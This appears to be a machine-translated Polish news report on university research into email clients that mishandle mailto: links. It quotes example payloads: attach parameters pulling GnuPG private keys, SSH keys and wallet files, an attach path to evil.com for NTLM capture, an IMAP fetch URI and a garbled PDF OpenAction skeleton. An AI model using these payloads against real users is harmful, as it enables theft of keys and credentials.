Naukowcy z Ruhr University Bochum (Niemcy) () zachowanie klientów pocztowych podczas przetwarzania linków „mailto:” z zaawansowanymi parametrami. Pięciu z dwudziestu zbadanych klientów poczty e-mail było podatnych na atak polegający na manipulacji zastępowaniem zasobów przy użyciu parametru „attach”. Dodatkowych sześciu klientów poczty e-mail było podatnych na atak polegający na wymianie klucza PGP i S/MIME, a trzech klientów było podatnych na atak mający na celu wyodrębnienie zawartości zaszyfrowanych wiadomości.
Linki «„służą do automatyzacji otwierania klienta pocztowego w celu napisania listu do adresata podanego w linku. Oprócz adresu, w ramach linku możesz określić dodatkowe parametry, takie jak temat listu i szablon dla typowej treści. Proponowany atak manipuluje parametrem „attach”, który umożliwia dołączenie załącznika do wygenerowanej wiadomości.
Klienci poczty Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) i Pegasus Mail były podatne na trywialny atak, który umożliwia automatyczne dołączanie dowolny plik lokalny, określony za pomocą łącza takiego jak „mailto:?attach=ścieżka_do_pliku”. Plik zostaje załączony bez wyświetlenia ostrzeżenia, więc bez szczególnej uwagi użytkownik może nie zauważyć, że list zostanie wysłany z załącznikiem.
Na przykład, używając linku takiego jak „mailto:[email chroniony]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" możesz wstawić do listu klucze prywatne z GnuPG. Możesz także przesłać zawartość portfeli kryptowalutowych (~/.bitcoin/wallet.dat), kluczy SSH (~/.ssh/id_rsa) oraz wszelkich plików dostępnych dla użytkownika. Co więcej, Thunderbird umożliwia dołączanie grup plików według maski przy użyciu konstrukcji takich jak „attach=/tmp/*.txt”.
Oprócz plików lokalnych niektóre programy poczty e-mail przetwarzają łącza do pamięci sieciowej i ścieżki na serwerze IMAP. W szczególności IBM Notes umożliwia przesyłanie pliku z katalogu sieciowego podczas przetwarzania łączy typu „attach=\\evil.com\dummyfile”, a także przechwytywanie parametrów uwierzytelniania NTLM poprzez wysłanie łącza do serwera SMB kontrolowanego przez osobę atakującą (żądanie zostanie wysłane z aktualnymi parametrami uwierzytelnienia użytkownika).
Thunderbird pomyślnie przetwarza żądania takie jak „attach=imap:///fetch>UID>/INBOX>1/”, które pozwalają na dołączenie treści z folderów na serwerze IMAP. Jednocześnie wiadomości pobrane z protokołu IMAP, zaszyfrowane przy użyciu OpenPGP i S/MIME, są automatycznie odszyfrowywane przez klienta pocztowego przed wysłaniem. Twórcy Thunderbirda byli o problemie w lutym i w numerze problem został już naprawiony (gałęzie Thunderbirda 52, 60 i 68 pozostają podatne na ataki).
Stare wersje Thunderbirda były również podatne na dwa inne zaproponowane przez badaczy warianty ataku na PGP i S/MIME. W szczególności Thunderbird, a także OutLook, PostBox, eM Client, MailMate i R2Mail2 zostały poddane atakowi polegającemu na wymianie klucza, spowodowanego faktem, że klient pocztowy automatycznie importuje i instaluje nowe certyfikaty przesyłane w wiadomościach S/MIME, co pozwala atakującego w celu zorganizowania podmiany kluczy publicznych już przechowywanych przez użytkownika.
Drugi atak, na który podatne są Thunderbird, PostBox i MailMate, manipuluje funkcjami mechanizmu automatycznego zapisywania wersji roboczych wiadomości i pozwala za pomocą parametrów mailto zainicjować deszyfrowanie zaszyfrowanych wiadomości lub dodanie podpisu cyfrowego do dowolnych wiadomości, za pomocą późniejsze przesłanie wyniku do serwera IMAP atakującego. W tym ataku tekst zaszyfrowany jest przesyłany poprzez parametr „body”, a znacznik „meta odświeżania” służy do inicjowania połączenia z serwerem IMAP atakującego. Na przykład: ' '
Aby automatycznie przetwarzać linki „mailto:” bez interakcji użytkownika, można wykorzystać specjalnie zaprojektowane dokumenty PDF - akcja OpenAction w formacie PDF pozwala na automatyczne uruchomienie obsługi mailto podczas otwierania dokumentu:
%PDF-1.5
1 0 ob
<< /Typ /Katalog /OpenAkcja [2 0 R] >>
obiekt końcowy
2 0 ob
<< /Typ /Akcja /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
obiekt końcowy
Źródło: opennet.ru